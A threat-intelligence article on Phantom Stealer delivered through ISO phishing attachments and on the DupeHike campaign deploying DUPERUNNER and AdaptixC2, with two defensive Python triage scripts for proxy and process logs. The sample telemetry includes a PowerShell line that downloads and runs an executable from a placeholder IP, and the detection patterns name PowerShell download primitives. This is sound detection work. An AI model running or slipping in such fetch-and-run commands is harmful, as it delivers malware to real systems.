Phantom Stealer Spreads via ISO Phishing Emails Targeting Russian Finance Sector

Cybersecurity researchers have revealed an active phishing operation targeting multiple sectors across Russia, with a strong focus on finance and accounting organizations. The campaign distributes Phantom Stealer through malicious ISO optical disc images attached to phishing emails.

The activity, tracked as Operation MoneyMount ISO, was uncovered by analysts at Seqrite Labs. While finance and accounting departments are the primary targets, procurement, legal, and payroll teams have also been affected.

Multi-Stage Infection Chain Using ISO Attachments

The campaign begins with phishing emails that impersonate legitimate financial communications. Victims are urged to verify or confirm a recent bank transfer. Attached to the email is a ZIP archive that supposedly contains transaction details.

Inside the archive is an ISO file named “Подтверждение банковского перевода.iso” (“Bank transfer confirmation.iso”). When the victim opens it, Windows mounts the image as a virtual CD drive; mounting by itself runs nothing, but launching the content inside the image loads an embedded DLL named “CreativeAI.dll”, which carries the Phantom Stealer payload.

Delivering the payload as a DLL inside a mounted image, rather than as a standalone executable dropped to disk, reduces the chance that file-based security tools flag it. ISO containers are also attractive to phishing operators for a second reason: on Windows systems that lack the November 2022 updates, files inside a mounted image did not inherit the Mark-of-the-Web from the downloaded ISO, so SmartScreen and Office Protected View warnings never appeared.

Phantom Stealer Capabilities

Once active, Phantom Stealer harvests data from both browser-based and desktop cryptocurrency wallets, particularly wallets associated with Chromium-based browsers. It also steals browser passwords, cookies, saved credit card details, Discord authentication tokens, and local files.

In addition, the malware monitors clipboard activity, logs keystrokes, and checks for virtual machines, sandboxes, and analysis environments; if one is detected, it terminates to avoid analysis.

Stolen data is exfiltrated through Telegram bots or attacker-controlled Discord webhooks, and the stealer can also upload files to remote FTP servers, which supports bulk data theft. Because the Telegram and Discord channels are ordinary HTTPS requests to legitimate SaaS domains, blocking by destination alone is rarely practical; it is the URL path that distinguishes bot and webhook traffic from normal use.
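The following proxy-log triage is an added example written for this article; it is not Seqrite's tooling or code taken from the stealer. It matches the Telegram Bot API URL shape (`api.telegram.org/bot<id>:<secret>/<method>`) and the Discord webhook URL shape (`discord.com/api/webhooks/<id>/<token>`), both of which are public API formats, against constructed log lines. Every timestamp, client address, bot ID, webhook ID and token below is a placeholder, and the five-field log layout is an assumption about the proxy; FTP exfiltration would need flow or firewall records and is not covered here.

```python
"""Proxy-log triage for the exfiltration channels described above: Telegram
bot API calls and Discord webhooks. Added example, not Seqrite's or the
stealer's code. Log lines are constructed; bot IDs, tokens and webhook IDs
are placeholders, not real indicators."""
import re
from collections import Counter
from typing import Dict, List, Optional

# Telegram Bot API: https://api.telegram.org/bot<bot_id>:<secret>/<method>
TELEGRAM_BOT = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)")
# Discord webhook: https://discord.com/api/webhooks/<webhook_id>/<token>
# (also accepts the ptb/canary hosts, the legacy discordapp.com name and a /vN/ prefix)
DISCORD_WEBHOOK = re.compile(
    r"https?://(?:(?:ptb\.|canary\.)?discord(?:app)?\.com)/api/(?:v\d+/)?webhooks/"
    r"(?P<webhook_id>\d+)/(?P<secret>[A-Za-z0-9_-]+)")


def classify_url(url: str) -> Optional[Dict[str, str]]:
    """Return channel, stable identifier and action for an exfil-style URL, else None.
    The secret part of the URL is deliberately not returned: it is the attacker's
    credential and belongs in evidence handling, not in tickets or chat."""
    m = TELEGRAM_BOT.search(url)
    if m:
        return {"channel": "telegram_bot", "id": m["bot_id"], "action": m["method"]}
    m = DISCORD_WEBHOOK.search(url)
    if m:
        return {"channel": "discord_webhook", "id": m["webhook_id"], "action": "execute"}
    return None


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Parse 'timestamp client verb url status' lines (a constructed layout) and
    report every request that hits a Telegram bot or Discord webhook endpoint."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue  # malformed or truncated line; skip rather than guess
        ts, client, verb, url, status = parts[:5]
        hit = classify_url(url)
        if hit:
            findings.append({"ts": ts, "client": client, "verb": verb,
                             "status": status, **hit})
    return findings


def clients_by_channel(findings: List[Dict[str, str]]) -> Counter:
    """Count requests per (client, channel, id): repeated POSTs from one workstation
    to a single bot or webhook are the pattern a stealer's exfil leaves behind."""
    return Counter((f["client"], f["channel"], f["id"]) for f in findings)


# Constructed sample log: one workstation posting to a bot and a webhook, one
# workstation using the ordinary Discord client API, and one benign request.
SAMPLE_LOG = [
    "2025-09-03T10:14:07Z 10.0.5.23 POST https://api.telegram.org/bot1234567890:AAE-constructed_token_0/sendDocument 200",
    "2025-09-03T10:14:09Z 10.0.5.23 POST https://api.telegram.org/bot1234567890:AAE-constructed_token_0/sendMessage 200",
    "2025-09-03T10:15:41Z 10.0.5.23 POST https://discord.com/api/webhooks/1111111111111111111/constructedWebhookToken_abc 204",
    "2025-09-03T10:16:02Z 10.0.5.77 GET https://discord.com/api/v9/users/@me 200",
    "2025-09-03T10:16:30Z 10.0.5.23 GET https://www.example.com/ 200",
]

if __name__ == "__main__":
    hits = scan_proxy_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["client"], h["channel"], h["id"], h["action"], h["status"])
    for key, n in clients_by_channel(hits).items():
        print(key, n)
```

Official Telegram clients speak MTProto rather than the Bot API, so a bot-token URL coming from a user workstation is unusual on its own; Discord webhooks are normally posted by server-side integrations, not the desktop client, although developer machines may legitimately test them. The bot ID and webhook ID are the stable values to pivot on across hosts, since the stealer's configuration reuses them.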

DupeHike Campaign Deploys DUPERUNNER and AdaptixC2

Separately, Russian organizations, particularly human resources and payroll departments, have been targeted by another phishing campaign known as DupeHike. This activity has been attributed to a threat cluster tracked as UNG0902.

According to Seqrite, the campaign uses ZIP attachments containing a decoy PDF and an LNK file. These ultimately lead to the deployment of a previously undocumented implant named DUPERUNNER, which loads AdaptixC2, an open-source command-and-control framework.

The LNK file, disguised as a document about annual bonuses, invokes powershell.exe to download DUPERUNNER. The implant then opens a decoy PDF to keep the victim occupied while it injects the AdaptixC2 beacon into a legitimate Windows process such as explorer.exe, notepad.exe, or msedge.exe.
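Both delivery chains on this page, the ISO whose embedded DLL is loaded from a mounted virtual CD drive and the LNK that invokes powershell.exe to fetch an implant which then injects into a sacrificial process, leave a recognisable trail in process-creation telemetry. The triage below is an added example written for this article, not Seqrite's detection content or code from either campaign. It evaluates three heuristics over events shaped like Sysmon Event ID 1 (ProcessCreate). All drive letters, host addresses, file names and command lines in the sample events are constructed, and the rules are deliberately simple starting points that a real deployment would tune with allowlists.

```python
"""Process-creation triage for the ISO-mounted DLL chain and the LNK ->
powershell.exe chain described above. Added example, not Seqrite's or the
attackers' code. Event fields mirror Sysmon Event ID 1 (ProcessCreate);
every path, drive letter, address and file name below is constructed."""
import re
from typing import Dict, List, Tuple

# Any drive letter other than the system drive C:. A mounted ISO appears as a
# new letter; a collector that records drive type could tighten this to CDROM.
NON_SYSTEM_DRIVE = re.compile(r"(?<![A-Za-z])[D-Zd-z]:\\")
NON_SYSTEM_DLL = re.compile(r'(?<![A-Za-z])[D-Zd-z]:\\[^\s"]*\.dll', re.I)
# Common PowerShell download primitives plus encoded-command switches.
DOWNLOAD_PRIMITIVES = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile"
    r"|start-bitstransfer|-e(?:nc(?:odedcommand)?)?\b)", re.I)
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
# Processes the article names as injection targets for the AdaptixC2 beacon.
INJECTION_TARGETS = {"explorer.exe", "notepad.exe", "msedge.exe"}
# Parents from which those targets normally start; anything else (for example a
# freshly downloaded binary in %TEMP%) is worth a look.
EXPECTED_PARENTS = {"explorer.exe", "userinit.exe", "svchost.exe", "services.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule that fires for one ProcessCreate event."""
    image = basename(ev["Image"])
    parent = basename(ev["ParentImage"])
    cmd = ev["CommandLine"]
    hits: List[str] = []
    # Rule 1: a DLL loader pointed at a DLL on a non-system drive, or a binary the
    # shell launched straight from a non-system drive (a mounted ISO or USB stick).
    if (image in DLL_LOADERS and NON_SYSTEM_DLL.search(cmd)) or (
            parent == "explorer.exe" and NON_SYSTEM_DRIVE.match(ev["Image"])):
        hits.append("exec_from_non_system_drive")
    # Rule 2: PowerShell launched by the shell (as when a user double-clicks an
    # LNK) whose command line downloads something.
    if (image in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe"
            and DOWNLOAD_PRIMITIVES.search(cmd)):
        hits.append("powershell_download_from_shell")
    # Rule 3: a known injection target created by an unexpected parent, the
    # footprint of a sacrificial process started for the beacon.
    if image in INJECTION_TARGETS and parent not in EXPECTED_PARENTS | {image}:
        hits.append("injection_target_unusual_parent")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """(index, rules) for every event that fires at least one rule."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := analyze_event(ev))]


# Constructed sample telemetry: three malicious steps and two benign controls.
SAMPLE_EVENTS = [
    # ISO mounted as E:, embedded DLL loaded through rundll32 (DLL name from the article)
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe E:\CreativeAI.dll,EntryPoint"},
    # LNK disguised as a bonus document launches PowerShell to fetch the next stage
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr http://198.51.100.7/premia.pdf -o $env:TEMP\premia.exe; start $env:TEMP\premia.exe"'},
    # the downloaded implant starts notepad.exe as a host for the injected beacon
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Users\ivan\AppData\Local\Temp\premia.exe", "CommandLine": "notepad.exe"},
    # benign: user opens Notepad from the shell
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
    # benign: rundll32 loading a system DLL from the system drive
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS):
        print(idx, basename(SAMPLE_EVENTS[idx]["Image"]), rules)
```

Rule 1 also fires on legitimate installers run from USB media, and rule 3 on any automation that starts Notepad or Edge from a script, so both need an environment-specific allowlist before they become alerts. Sysmon Event ID 7 (ImageLoaded) would additionally catch the DLL itself being mapped, which matters if the loader is not rundll32 or regsvr32.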

Broader Phishing Activity Against Russian Organizations

Other phishing campaigns have also targeted the finance, legal, and aerospace sectors in Russia, distributing frameworks such as Cobalt Strike and malware families including Formbook, DarkWatchman, and PhantomRemote. These tools enable data theft as well as interactive hands-on-keyboard access.

In several cases, attackers abused the email infrastructure of already compromised Russian companies to send spear phishing messages, increasing trust and delivery success.

French cybersecurity firm Intrinsec has linked attacks against the Russian aerospace industry to hacktivist groups aligned with Ukrainian interests. The activity, observed between June and September 2025, overlaps with intrusion sets tracked as Hive0117, Operation CargoTalon, and Rainbow Hyena, also known as Fairy Trickster, Head Mare, and PhantomCore.

Some campaigns redirected victims to credential harvesting pages hosted on IPFS and Vercel, targeting Microsoft Outlook accounts and services linked to Bureau 1440, a Russian aerospace organization.
